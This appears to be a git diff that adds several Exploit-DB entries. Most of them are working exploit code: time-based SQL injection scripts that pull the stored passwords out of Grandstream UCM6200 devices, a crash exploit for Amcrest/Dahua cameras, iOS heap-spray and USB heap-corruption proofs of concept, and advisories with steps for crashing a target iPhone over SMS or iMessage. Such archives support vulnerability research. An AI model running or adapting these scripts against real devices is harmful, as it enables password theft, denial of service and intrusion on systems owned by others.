+    return response
+
+top_parser = argparse.ArgumentParser(description='')
+top_parser.add_argument('--rhost', action="store", dest="rhost",
+required=True, help="The remote host to connect to")
+top_parser.add_argument('--rport', action="store", dest="rport", type=int,
+help="The remote port to connect to", default=8888)
+top_parser.add_argument('--user', action="store", dest="user",
+required=True, help="The user to brute force")
+args = top_parser.parse_args()
+
+
+print('[+] Reaching out to ' + args.rhost + ':' + str(args.rport))
+
+length = 0
+while length < 100:
+
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.connect((args.rhost, args.rport))
+
+    challenge_resp = send_cti_with_length(sock, b"action=challenge&user=" +
+args.user.encode('utf-8') + b"' AND LENGTH(user_password)=" +
+str(length).encode('utf-8') + b"--")
+    inject_result = json.loads(challenge_resp)
+
+    if (inject_result['status'] == 0):
+        break
+    else:
+        length = length + 1
+
+    sock.close()
+
+if length == 100:
+    print('[-] Failed to discover the password length')
+    sys.exit(1)
+
+print('[+] Password length', length)
+
+password = ''
+while len(password) < length:
+    value = 0x20
+    while value < 0x80:
+
+        if value == 0x22 or value == 0x5c:
+            temp_pass = password + '\\'
+            temp_pass = temp_pass + chr(value)
+        else:
+            temp_pass = password + chr(value)
+
+        temp_pass_len = len(temp_pass)
+
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.connect((args.rhost, args.rport))
+
+        challenge_resp = send_cti_with_length(sock,
+b"action=challenge&user=" + args.user.encode('utf-8') + b"' AND
+user_password LIKE \'" + temp_pass.encode('utf-8') + b"%' AND
+substr(user_password,1," + str(temp_pass_len).encode('utf-8') + b") = '" +
+temp_pass.encode('utf-8') + b"'--")
+        inject_result = json.loads(challenge_resp)
+
+        sock.close()
+
+        if (inject_result['status'] == 0):
+            password = temp_pass
+            break
+        else:
+            value = value + 1
+            continue
+
+    if value == 0x80:
+        print('oh no.')
+        sys.exit(0)
+
+print('[+] The password is', password)
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48271.py b/exploits/hardware/webapps/48271.py
new file mode 100755
index 000000000..5a6ae0235
--- /dev/null
+++ b/exploits/hardware/webapps/48271.py
@@ -0,0 +1,119 @@
+# Exploit Title: Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection
+# Date: 2020-03-30
+# Exploit Author: Jacob Baines
+# Vendor Homepage: http://www.grandstream.com/
+# Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware
+# Version: 1.0.20.20 and below
+# Tested on: Grandstream UCM6202 1.0.20.20
+# CVE : CVE-2020-5725
+# Grandstream UCM6200 Series WebSocket 1.0.20.20 SQL Injection Password Disclosure via Login (time based)
+# Advisory: https://www.tenable.com/security/research/tra-2020-17
+# Sample output:
+#
+# albinolobster@ubuntu:~$ python3 websockify_login_injection.py --rhost 192.168.2.1 --user lolwat
+# [+] Password length is 9
+# [+] Discovering password...
+# LabPass1%
+# [+] Done! The password is LabPass1%
+
+import sys
+import ssl
+import time
+import asyncio
+import argparse
+import websockets
+
+async def password_guess(ip, port, username):
+
+    # the path to exploit
+    uri = 'wss://' + ip + ':' + str(8089) + '/websockify'
+
+    # no ssl verification
+    ssl_context = ssl.SSLContext()
+    ssl_context.verify_mode = ssl.CERT_NONE
+    ssl_context.check_hostname = False
+
+    # determine the length of the password. The timeout is 10 seconds...
+probably
+    # way too long but whatever.
+    length = 0
+    while length < 100:
+        async with websockets.connect(uri, ssl=ssl_context) as websocket:
+            start = time.time()
+            login =
+'{"type":"request","message":{"transactionid":"123456789zxa","action":"login","username":"'
++ username + '\' AND LENGTH(user_password)==' + str(length) + ' AND
+88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2)))) or
+\'1\'=\'2","token":"lolwat"}}'
+            await websocket.send(login)
+            response = await websocket.recv()
+
+            if (time.time() - start) < 5:
+                length = length + 1
+                continue
+            else:
+                break
+
+    # if we hit max password length than we've done something wrong
+    if (length == 100):
+        print('[+] Couldn\'t determine the passwords length.')
+        sys.exit(1)
+
+    print('[+] Password length is', length)
+    print('[+] Discovering password...')
+
+    # Now that we know the password length, just guess each password byte
+until
+    # we've reached the full length. Again timeout set to 10 seconds.
+    password = ''
+    while len(password) < length:
+        value = 0x20
+        while value < 0x80:
+            if value == 0x22 or value == 0x5c:
+                temp_pass = password + '\\'
+                temp_pass = temp_pass + chr(value)
+            else:
+                temp_pass = password + chr(value)
+
+            temp_pass_len = len(temp_pass)
+
+            start = time.time()
+
+            async with websockets.connect(uri, ssl=ssl_context) as
+websocket:
+                challenge =
+'{"type":"request","message":{"transactionid":"123456789zxa","action":"login","username":"'
++ username + '\' AND user_password LIKE \'' + temp_pass +'%\' AND
+substr(user_password,1,' + str(temp_pass_len) + ') = \'' + temp_pass + '\'
+AND 88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2)))) or
+\'1\'=\'2","token":"lolwat"}}'
+                await websocket.send(challenge)
+                response = await websocket.recv()
+
+            if (time.time() - start) < 5:
+                value = value + 1
+                continue
+            else:
+                print('\r' + temp_pass, end='')
+                password = temp_pass
+                break
+
+        if value == 0x80:
+            print('')
+            print('[-] Failed to determine the password.')
+            sys.exit(1)
+
+    print('')
+    print('[+] Done! The password is', password)
+
+top_parser = argparse.ArgumentParser(description='')
+top_parser.add_argument('--rhost', action="store", dest="rhost",
+required=True, help="The remote host to connect to")
+top_parser.add_argument('--rport', action="store", dest="rport", type=int,
+help="The remote port to connect to", default=8089)
+top_parser.add_argument('--user', action="store", dest="user",
+required=True, help="The user to brute force")
+args = top_parser.parse_args()
+
+asyncio.get_event_loop().run_until_complete(password_guess(args.rhost,
+args.rport, args.user))
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48304.py b/exploits/hardware/webapps/48304.py
new file mode 100755
index 000000000..b73eb9ca5
--- /dev/null
+++ b/exploits/hardware/webapps/48304.py
@@ -0,0 +1,153 @@
+# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
+# Date: 2020-04-07
+# Exploit Author: Jacob Baines
+# Vendor Homepage: https://amcrest.com/
+# Software Link: https://amcrest.com/firmwaredownloads
+# Version: Many different versions due to number of Dahua/Amcrest/etc
+# devices affected
+# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5
+# 4.000.00AC000.0
+# CVE : CVE-2020-5735
+# Advisory: https://www.tenable.com/security/research/tra-2020-20
+# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash
+
+import argparse
+import hashlib
+import socket
+import struct
+import sys
+import md5
+import re
+
+## DDNS test functionality. Stack overflow via memcpy
+
+def recv_response(sock):
+    # minimum size is 32 bytes
+    header = sock.recv(32)
+
+    # check we received enough data
+    if len(header) != 32:
+        print 'Invalid response. Too short'
+        return (False, '', '')
+
+    # extract the payload length field
+    length_field = header[4:8]
+    payload_length = struct.unpack_from('I', length_field)
+    payload_length = payload_length[0]
+
+    # uhm... lets be restrictive of accepted lengths
+    if payload_length < 0 or payload_length > 4096:
+        print 'Invalid response. Bad payload length'
+        return (False, header, '')
+
+    if (payload_length == 0):
+        return (True, header, '')
+
+    payload = sock.recv(payload_length)
+    if len(payload) != payload_length:
+        print 'Invalid response. Bad received length'
+        return (False, header, payload)
+
+    return (True, header, payload)
+
+def sofia_hash(msg):
+    h = ""
+    m = hashlib.md5()
+    m.update(msg)
+    msg_md5 = m.digest()
+    for i in range(8):
+        n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e
+        if n > 9:
+            if n > 35:
+                n += 61
+            else:
+                n += 55
+        else:
+            n += 0x30
+        h += chr(n)
+    return h
+
+top_parser = argparse.ArgumentParser(description='lol')
+top_parser.add_argument('-i', '--ip', action="store", dest="ip",
+required=True, help="The IPv4 address to connect to")
+top_parser.add_argument('-p', '--port', action="store", dest="port",
+type=int, help="The port to connect to", default="37777")
+top_parser.add_argument('-u', '--username', action="store",
+dest="username", help="The user to login as", default="admin")
+top_parser.add_argument('--pass', action="store", dest="password",
+required=True, help="The password to use")
+args = top_parser.parse_args()
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
+sock.connect((args.ip, args.port))
+print "[+] Connected!"
+
+# send the old style login request. We'll use blank hashes. This should
+# trigger a challenge from new versions of the camera
+old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" +
+             "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash
+             "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash
+             "\x05\x02\x00\x01\x00\x00\xa1\xaa")
+sock.sendall(old_login)
+(success, header, challenge) = recv_response(sock)
+if success == False or not challenge:
+    print 'Failed to receive the challenge'
+    print challenge
+    sys.exit(0)
+
+# extract the realm and random seed
+seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n",
+challenge)
+if seeds == None:
+    print 'Failed to extract realm and random seed.'
+    print challenge
+    sys.exit(0)
+
+realm = seeds.group(1)
+random = seeds.group(2)
+
+# compute the response
+realm_hash = md5.new(args.username + ":" + realm + ":" +
+args.password).hexdigest().upper()
+random_hash = md5.new(args.username + ":" + random + ":" +
+realm_hash).hexdigest().upper()
+sofia_result = sofia_hash(args.password)
+final_hash = md5.new(args.username + ":" + random + ":" +
+sofia_result).hexdigest().upper()
+
+challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" +
+                  "\x00\x00\x00\x00\x00\x00\x00\x00" +
+                  "\x00\x00\x00\x00\x00\x00\x00\x00" +
+                  "\x05\x02\x00\x08\x00\x00\xa1\xaa" +
+                  args.username + "&&" + random_hash + final_hash)
+sock.sendall(challenge_resp)
+
+(success, header, payload) = recv_response(sock)
+if success == False or not header:
+    print 'Failed to receive the session id'
+    sys.exit(0)
+
+session_id_bin = header[16:20]
+session_id_int = struct.unpack_from('I', session_id_bin)
+if session_id_int[0] == 0:
+    print "Log in failed."
+    sys.exit(0)
+
+session_id = session_id_int[0]
+print "[+] Session ID: " + str(session_id)
+
+# firmware version
+command = "Protocol: " + ("a" * 0x300) + "\r\n"
+command_length = struct.pack("I", len(command))
+firmware = ("\x62\x00\x00\x00" + command_length +
+            "\x04\x00\x00\x00\x00\x00\x00\x00" +
+            "\x00\x00\x00\x00\x00\x00\x00\x00" +
+            "\x00\x00\x00\x00\x00\x00\x00\x00" +
+            command)
+sock.sendall(firmware)
+(success, header, firmware_string) = recv_response(sock)
+if success == False and not header:
+    print "[!] Probably crashed the server."
+else:
+    print "[+] Attack failed."
\ No newline at end of file
diff --git a/exploits/ios/dos/46803.c b/exploits/ios/dos/46803.c
new file mode 100644
index 000000000..21a14958f
--- /dev/null
+++ b/exploits/ios/dos/46803.c
@@ -0,0 +1,165 @@
+// (c) 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes
+// Intended only for educational and defensive purposes only. 
+// Use at your own risk.
+ 
+#include <xpc/xpc.h>
+#import <pthread.h>
+#include <mach/mach.h>
+#include <mach/task.h>
+#include <dlfcn.h>
+#include <mach-o/dyld_images.h>
+#include <objc/runtime.h>
+ 
+#define AGENT 1
+ 
+#define FILL_DICT_COUNT 0x600
+#define FILL_COUNT 0x1000
+#define FREE_COUNT 0x2000
+#define FILL_SIZE (0xc0)
+ 
+int need_stop = 0;
+ 
+struct heap_spray {
+    void* fake_objc_class_ptr;
+    uint32_t r10;
+    uint32_t r4;
+    void* fake_sel_addr;
+    uint32_t r5;
+    uint32_t r6;
+    uint64_t cmd;
+    uint8_t pad1[0x3c];
+    uint32_t stack_pivot;
+    struct fake_objc_class_t {
+        char pad[0x8];
+        void* cache_buckets_ptr;
+        uint32_t cache_bucket_mask;
+    } fake_objc_class;
+    struct fake_cache_bucket_t {
+        void* cached_sel;
+        void* cached_function;
+    } fake_cache_bucket;
+    char command[32];
+};
+ 
+void fill_once(){
+     
+#if AGENT
+    xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
+#else
+    xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
+#endif
+     
+    xpc_connection_set_event_handler(client, ^void(xpc_object_t response) {
+        xpc_type_t t = xpc_get_type(response);
+        if (t == XPC_TYPE_ERROR){
+            printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));
+            need_stop = 1 ;
+        }
+        //printf("received an event\n");
+    });
+     
+    xpc_connection_resume(client);
+    xpc_object_t main_dict = xpc_dictionary_create(NULL, NULL, 0);
+     
+    xpc_object_t arr = xpc_array_create(NULL, 0);
+     
+    xpc_object_t spray_dict = xpc_dictionary_create(NULL, NULL, 0);
+    xpc_dictionary_set_int64(spray_dict, "CFPreferencesOperation", 8);
+    xpc_dictionary_set_string(spray_dict, "CFPreferencesDomain", "xpc_str_domain");
+    xpc_dictionary_set_string(spray_dict, "CFPreferencesUser", "xpc_str_user");
+     
+    char key[100];
+    char value[FILL_SIZE];
+    memset(value, "A", FILL_SIZE);
+    *((uint64_t *)value) = 0x4142010180202020;
+    //*((uint64_t *)value) = 0x180202020;
+    value[FILL_SIZE-1]=0;
+    for (int i=0; i<FILL_DICT_COUNT; i++) {
+        sprintf(key, "%d",i);
+        xpc_dictionary_set_string(spray_dict, key, value);
+    }
+      
+    //NSLog(@"%@", spray_dict);
+    for (uint64_t i=0; i<FILL_COUNT; i++) {
+        xpc_array_append_value(arr, spray_dict);
+    }
+     
+    xpc_dictionary_set_int64(main_dict, "CFPreferencesOperation", 5);
+     
+    xpc_dictionary_set_value(main_dict, "CFPreferencesMessages", arr);
+ 
+    void* heap_spray_target_addr = (void*)0x180202000;
+    struct heap_spray* map = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
+    memset(map, 0, 0x1000);
+    struct heap_spray* hs = (struct heap_spray*)((uint64_t)map + 0x20);
+    //hs->null0 = 0;
+    hs->cmd = -1;
+    hs->fake_objc_class_ptr = &hs->fake_objc_class;
+    hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
+    hs->fake_objc_class.cache_bucket_mask = 0;
+    hs->fake_sel_addr = &hs->fake_cache_bucket.cached_sel;
+    // nasty hack to find the correct selector address
+    hs->fake_cache_bucket.cached_sel = 0x7fff00000000 + (uint64_t)NSSelectorFromString(@"dealloc");
+     
+    hs->fake_cache_bucket.cached_function = 0xdeadbeef;
+    size_t heap_spray_pages = 0x40000;
+    size_t heap_spray_bytes = heap_spray_pages * 0x1000;
+    char* heap_spray_copies = malloc(heap_spray_bytes);
+    for (int i = 0; i < heap_spray_pages; i++){
+    memcpy(heap_spray_copies+(i*0x1000), map, 0x1000);
+    }
+    xpc_dictionary_set_data(main_dict, "heap_spray", heap_spray_copies, heap_spray_bytes);
+ 
+    //NSLog(@"%@", main_dict);
+    xpc_connection_send_message(client, main_dict);
+    printf("fill once\n");
+    xpc_release(main_dict);
+}
+ 
+void trigger_vul(){
+    #if AGENT
+        printf("AGENT\n");
+        xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
+    #else
+        printf("DAEMON\n");
+        xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
+    #endif
+        xpc_connection_set_event_handler(conn, ^(xpc_object_t response) {
+            xpc_type_t t = xpc_get_type(response);
+            if (t == XPC_TYPE_ERROR){
+                printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));
+                need_stop = 1 ;
+            }
+        });
+        xpc_connection_resume(conn);
+         
+        xpc_object_t hello = xpc_dictionary_create(NULL, NULL, 0);
+        xpc_object_t arr = xpc_array_create(NULL, 0);
+     
+        xpc_object_t arr_free = xpc_dictionary_create(NULL, NULL, 0);
+        xpc_dictionary_set_int64(arr_free, "CFPreferencesOperation", 4);
+        xpc_array_append_value(arr, arr_free);
+        for (int i=0; i<FREE_COUNT; i++) {
+            xpc_object_t arr_elem1 = xpc_dictionary_create(NULL, NULL, 0);
+            xpc_dictionary_set_int64(arr_elem1, "CFPreferencesOperation", 20);
+            xpc_array_append_value(arr, arr_elem1);
+        }
+        //printf("%p, %p\n", arr_elem1, hello);
+        xpc_dictionary_set_int64(hello, "CFPreferencesOperation", 5);
+        xpc_dictionary_set_value(hello, "CFPreferencesMessages", arr);
+ 
+        //NSLog (@"%@", hello);
+        fill_once();
+        xpc_connection_send_message(conn, hello);
+        NSLog(@" trigger vuln");
+        xpc_release(hello);
+}
+ 
+int main(int argc, const char * argv[]) {
+ 
+    pthread_t fillthread1,triger_thread;
+    NSLog(@"start to trigger..");
+    trigger_vul();
+ 
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/ios/dos/46913.txt b/exploits/ios/dos/46913.txt
new file mode 100644
index 000000000..8f764041d
--- /dev/null
+++ b/exploits/ios/dos/46913.txt
@@ -0,0 +1,27 @@
+Visual Voicemail (VVM) is a feature of mobile devices that allows voicemail to be read in an email-like format. Carriers set up a Visual Voicemail server that supports IMAP, and the device queries this server for new email. Visual Voicemail is configured over SMS, and carriers inform devices of the location of the IMAP server by sending a specially formatted SMS message containing the URL of the IMAP server.
+
+SMS messages are determined to be VVM-related based on their PID field as well as their contents. Both of these fields can be set by a device sending SMS messages, so any device can send a message that causes Visual Voicemail to query an IMAP server specified in the message. This means that an attacker can force a device to query an IMAP server they control without the user interacting with the device in any way.
+
+There is an object lifetime issue in the iPhone IMAP client that can be accessed in this way. It happens when a NAMESPACE command response contains a namespace that cannot be parsed correctly. It leads to the mailbox separator being freed, but not replaced with a valid object. This leads to a selector being called on an object that is not valid.
+
+To reproduce this issue:
+
+1) Run testcrash.py on a remotely accessible server. To run on port 993, this will need to be on a server that has a domain name, and a certificate that verifies correctly. Replace the "YOUR KEY HERE" fields in testcrash.py with the location of the cert files. On some carriers, it is possible to use port 143 without SSL instead.
+
+2) Send the attached SMS messages to the device, first statepdu.txt and then mboxupdatepdu.txt. Replace the destination number and server location in the messages with the location of your target device and server before sending.
+
+3) The device will connect to the server, and then crash
+
+Note that this attack depends somewhat on the carrier the device is on. I tested this issue on an AT&T SIM. I was not able to reproduce this issue on a T-Mobile SIM, because their network does not allow VVM connections to outside servers. It might be possible to bypass this by hosting the server on a peer device on the network, but I didn't try this. The PID used for VVM SMS messages also varies based on carrier.
+
+I've attached a crash log for this issue. I've also attached decoded.txt, which describes the contents of the SMS pdus, and NAMESPACE.zip, which is a non-minimized PoC that leaders to a wider variety of crashes.
+
+When retrieving a message, the VVM client calls [IMAPAccount _updateSeparatorAndNamespaceWithConnection:] to get the server separator and namespace prefix. This method first retrieves the server separator by calling [MFIMAPConnection separatorChar] which causes the LIST command to be sent to the server, and returns the separator. The method also stores the separator as a member of the connection object, which gives the separator its sole reference. [IMAPAccount _updateSeparatorAndNamespaceWithConnection:]  then calls [MFIMAPConnection serverPathPrefix] to get the prefix,  which in turn calls [MFIMAPConnection _doNamespaceCommand] to perform the NAMESPACE command over the network. If this command fails for any reason (for example, malformed response, LOGOUT command, etc.), it will call [MFIMAPConnection disconnectAndNotifyDelegate:], which removes the separator from the connection object, removing its only reference. The rest of [IMAPAccount _updateSeparatorAndNamespaceWithConnection:]  will then use a separator object that has been freed.
+
+This issue was resolved by adding a lock to [IMAPAccount _updateSeparatorAndNamespaceWithConnection:]  and [MFIMAPConnection disconnectAndNotifyDelegate:] so that they cannot run at the same time for the same connection.
+
+This issue was fixed on Tuesday, May 14
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46913.zip
\ No newline at end of file
diff --git a/exploits/ios/dos/47415.txt b/exploits/ios/dos/47415.txt
new file mode 100644
index 000000000..36fc2762f
--- /dev/null
+++ b/exploits/ios/dos/47415.txt
@@ -0,0 +1,34 @@
+When an NSKeyedUnarchiver decodes an object, it first allocates the object using allocWithZone, and then puts the object into a dictionary for temporary objects. It then calls the appropriate initWithCoder: on the allocated object. If initWithCoder: or any method it calls decodes the same object, its gets back a reference to the original object in the temporary object dictionary. For many classes, this is a placeholder object that will throw an "uninitialized" exception when accessed, but for some classes, this is the object that will eventually be returned by initWithCoder:. This means that when an initWithCoder: method decodes an object that has a reference to itself in it, the object might not be fully initialized.
+
+The NSSharedKeyDictionary class is a subclass of NSDictionary that allows for a dictionary to be greatly optimized if the keys it uses are declared up front. The keys are specified in an instance of class NSSharedKeySet. This instance can have a child keyset, and the child keyset can also have a child keyset and so on. This allows for multiple keysets to be used by a single dictionary. When a dictionary is initialized, it adds the length of its keyset as well as child keysets at each level, and initializes a value array of that length. Values are then stored and accessed by calculating a key's index based on its position in it keyset, and accessing that location in the value array.
+
+It is possible to combine these two behaviors to create an NSSharedKeyDictionary with a value array that is too small. When an NS NSSharedKeyDictionary is decoded, it will start by decoding the NSSharedKeySet for that dictionary. That keyset, can in turn decode another dictionary as one of its keys. If the second dictionary decodes the same keyset as its keyset, it will get back a reference to the keyset that is in the process of being initialized. That keyset could have a child keyset, but the child keyset has not been decoded at this stage in initializtion. This leads to the second dictionary calculating the length of its value array based on keyset not having a child keyset, even though it could have one. This means that if a key in the child keyset of this array is accessed in this dictionary, the value returned will be read from unallocated memory on the heap (this memory could also be written if a key in the child keyset is set, but it unusual for decoded dictionaries to be written to).
+
+To reproduce this issue in iMessage:
+
+1) install frida (pip3 install frida)
+2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
+3) in injectMessage.js replace the marker "PATH" with the path of the obj file
+4) in the local directory, run:
+
+python3 sendMessage.py
+
+This PoC does not crash very reliably in Springboard, though I think this issue is likely exploitable. To make reproducing this issue easier, I've attached a test program for Mac that reproduces the decoding issue. To reproduce the issue using this program:
+
+1) Build the program:
+
+clang decodeshared.m -o decodeshared -fobjc-arc -framework Corespotlight
+
+2) Run the program with libgmalloc and the attached obj file:
+
+DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib ./decodeshared obj
+
+This will lead to a consistent crash where the out-of-bounds read occurs.
+
+A log of this issue crashing in Springboard is attached.
+
+The NSSharedDictionary initWithCoder implementation is very complex and greatly increases the attack surface of decoding the NSDictionary class. Moreover, it has functional problems that suggest that it is not widely used, and NSSharedDictionary instances can be correctly encoded and decoded with the NSDictionary initWithCoder. I recommend that this issue be resolved by removing custom encoding for the NSSharedDictionary class.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47415.zip
\ No newline at end of file
diff --git a/exploits/ios/dos/47607.c b/exploits/ios/dos/47607.c
new file mode 100644
index 000000000..67f997806
--- /dev/null
+++ b/exploits/ios/dos/47607.c
@@ -0,0 +1,209 @@
+# Exploit Title: iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC)
+# Date: 2019-10-29
+# Exploit Author: Sem Voigtlander, Joshua Hill and Raz Mashat
+# Vendor Homepage: https://apple.com/
+# Software Link: https://support.apple.com/en-hk/HT210606
+# Version: iOS 13
+# Tested on: iOS 12.4.1
+# CVE : N/A
+
+# A vulnerable implementation of IOInterruptEventSource on a workloop exists in IOUSBDeviceFamily.
+# The code can be triggered by a local attacker by sending a malicious USB control request to device.
+# It seems the faulting address register is corrupted as result of a heap corruption vulnerability.
+# However, on earlier iOS versions (tested on 12.0.1) we were able to trigger a use after free in reserved->statistics relating to the same vulnerable code too.
+# This bug was found through statically analyzing xnu from public source and optimized USB fuzzing.
+# A proof of concept written in C for macOS is attached, for other platforms python and c code using libusb exists on GitHub (https://github.com/userlandkernel/USBusted)
+
+iousbusted.c
+
+/* 
+	Pure IOKit implementation of CVE-2019-8718 
+	Written by Sem Voigtländer.
+	Compile: clang iousbusted.c -o iousbusted -framework IOKit -framework CoreFoundation
+	Tip: You can also use this for projects like checkm8 autopwn etc.
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <mach/mach.h>
+#include <IOKit/usb/IOUSBLib.h>
+#include <IOKit/IOCFPlugIn.h>
+#include <CoreFoundation/CoreFoundation.h>
+
+/* Faster comparissions for 64-bit integers than != and == */
+#define FCOMP(P1,P2) !(P1 ^ P2)
+
+const char *defaultMsg = "HELLO WORLD";
+
+/* Method for sending an USB control message to a target device */
+static int send_usb_msg(IOUSBDeviceInterface** dev, int type, int reqno, int val, int idx,  const char *msg)
+{
+    
+    if(!dev){
+        printf("No device handle given.\n");
+        return KERN_FAILURE;
+    }
+	
+    if(!msg)
+        msg = defaultMsg;
+    
+    IOUSBDevRequest req;
+    req.bmRequestType = type;
+    req.bRequest = reqno;
+    req.wValue = val;
+    req.wIndex = idx;
+    req.wLength = strlen(msg);
+    req.pData =  msg;
+    req.wLenDone = 0;
+    IOReturn rc = KERN_SUCCESS;
+    
+    rc = (*dev)->DeviceRequest(dev, &req);
+    
+    if(rc != KERN_SUCCESS)
+    {
+        return rc;
+    }
+    
+    return KERN_SUCCESS;
+}
+
+static int send_usbusted_pwn_msg(IOUSBDeviceInterface** dev, const char *msg)
+{
+    
+    if(!dev){
+        printf("No device handle given.\n");
+        return KERN_FAILURE;
+    }
+    
+    kern_return_t rc = send_usb_msg(dev, 0|0x80, 0x6, 0x30c, 0x409, msg);
+    
+    if(rc != kIOReturnSuccess)
+    {
+        return rc;
+    }
+
+    return KERN_SUCCESS;
+}
+
+/* Print information from an IOKit USB device */
+static int print_usb_device(io_service_t device){
+    
+    kern_return_t err = KERN_SUCCESS;
+    
+    CFNumberRef vid = 0;
+    CFNumberRef pid = 0;
+    CFNumberRef locationID = 0;
+    
+    CFMutableDictionaryRef p = NULL;
+    err = IORegistryEntryCreateCFProperties(device, &p, NULL, 0);
+    
+    if(err != KERN_SUCCESS || !p)
+        return err;
+    
+    if(!CFDictionaryGetValueIfPresent(p, CFSTR("idVendor"), &vid))
+        return KERN_FAILURE;
+    
+    if(!CFDictionaryGetValueIfPresent(p, CFSTR("idProduct"), &pid))
+        return KERN_FAILURE;
+    
+    CFDictionaryGetValueIfPresent(p, CFSTR("locationID"), &locationID);
+    
+    CFNumberGetValue(vid, kCFNumberSInt32Type, &vid);
+    CFNumberGetValue(pid, kCFNumberSInt32Type, &pid);	// <-- yes I know this is dirty, I was tired.
+    
+    if(locationID)
+        CFNumberGetValue(locationID, kCFNumberSInt32Type, &locationID);
+    
+    printf("Got device %#x @ %#x (%#x:%#x)\n", device, locationID, vid, pid);
+    return err;
+}
+
+/* Get a handle for sending to a device */
+static int get_usbdevice_handle(io_service_t device, IOUSBDeviceInterface* dev){
+
+    kern_return_t err = KERN_SUCCESS;
+    SInt32 score;
+    IOCFPlugInInterface** plugInInterface = NULL;
+    
+    err = IOCreatePlugInInterfaceForService(device,
+                                            kIOUSBDeviceUserClientTypeID,
+                                            kIOCFPlugInInterfaceID,
+                                            &plugInInterface, &score);
+    
+    if (err != KERN_SUCCESS || plugInInterface == NULL)
+        return err;
+    
+    err = (*plugInInterface)->QueryInterface(plugInInterface, CFUUIDGetUUIDBytes(kIOUSBDeviceInterfaceID), (LPVOID*)dev);
+    
+    if(err != kIOReturnSuccess)
+        return err;
+    
+    // Now done with the plugin interface.
+    (*plugInInterface)->Release(plugInInterface);
+    //plugInInterface = NULL;
+    
+    if(!dev)
+        return KERN_FAILURE;
+    
+    return err;
+}
+
+/* Iterate over all USB devices */
+static int iterate_usb_devices(const char *msg){
+    CFMutableDictionaryRef matchingDict;
+    io_iterator_t iter;
+    kern_return_t kr;
+    io_service_t device;
+
+    /* set up a matching dictionary for the class */
+    matchingDict = IOServiceMatching(kIOUSBDeviceClassName);
+    if (matchingDict == NULL)
+    {
+        return -1; // fail
+    }
+    
+    /* Now we have a dictionary, get an iterator.*/
+    kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter);
+    if (kr != KERN_SUCCESS)
+    {
+        return -1;
+    }
+
+    /* iterate */
+    while ((device = IOIteratorNext(iter)))
+    {
+        /* do something with device, eg. check properties */
+        kr = print_usb_device(device);
+        
+        if(kr != KERN_SUCCESS){
+            printf("Skipping device as it has no vid / pid.\n");
+            continue;
+        }
+        
+        IOUSBDeviceInterface **dev = 0;
+        kr = get_usbdevice_handle(device, &dev);
+        
+        if(kr != KERN_SUCCESS){
+            printf("Skipping device as no handle for it could be retrieved.\n");
+            continue;
+        }
+        
+        kr = send_usbusted_pwn_msg(dev, msg);
+        printf("RET: %s\n\n", mach_error_string(kr));
+        
+        /* And free the reference taken before continuing to the next item */
+        IOObjectRelease(device);
+    }
+
+   /* Done, release the iterator */
+   IOObjectRelease(iter);
+   return 0;
+}
+
+int main(int argc, char *argv[]){
+    char payload[108];
+    memset(&payload, 'A', 108);
+	int err = iterate_usb_devices(payload);
+	return err;
+}
\ No newline at end of file
diff --git a/exploits/ios/dos/47665.py b/exploits/ios/dos/47665.py
new file mode 100755
index 000000000..3b5aa423d
--- /dev/null
+++ b/exploits/ios/dos/47665.py
@@ -0,0 +1,28 @@
+# Exploit Title: Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-11-16
+# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
+# Software Link: App Store for iOS devices
+# GE Intelligent Platforms, Inc.
+# Tested Version: 5.0.0.25920
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 7 iOS 13.2
+
+# Steps to Produce the Crash:
+# 1.- Run python code: Open_Proficy_HMI-SCADA_for_iOS_5.0.0.25920.py
+# 2.- Copy content to clipboard
+# 3.- Open "Open Proficy HMI-SCADA for iOS"
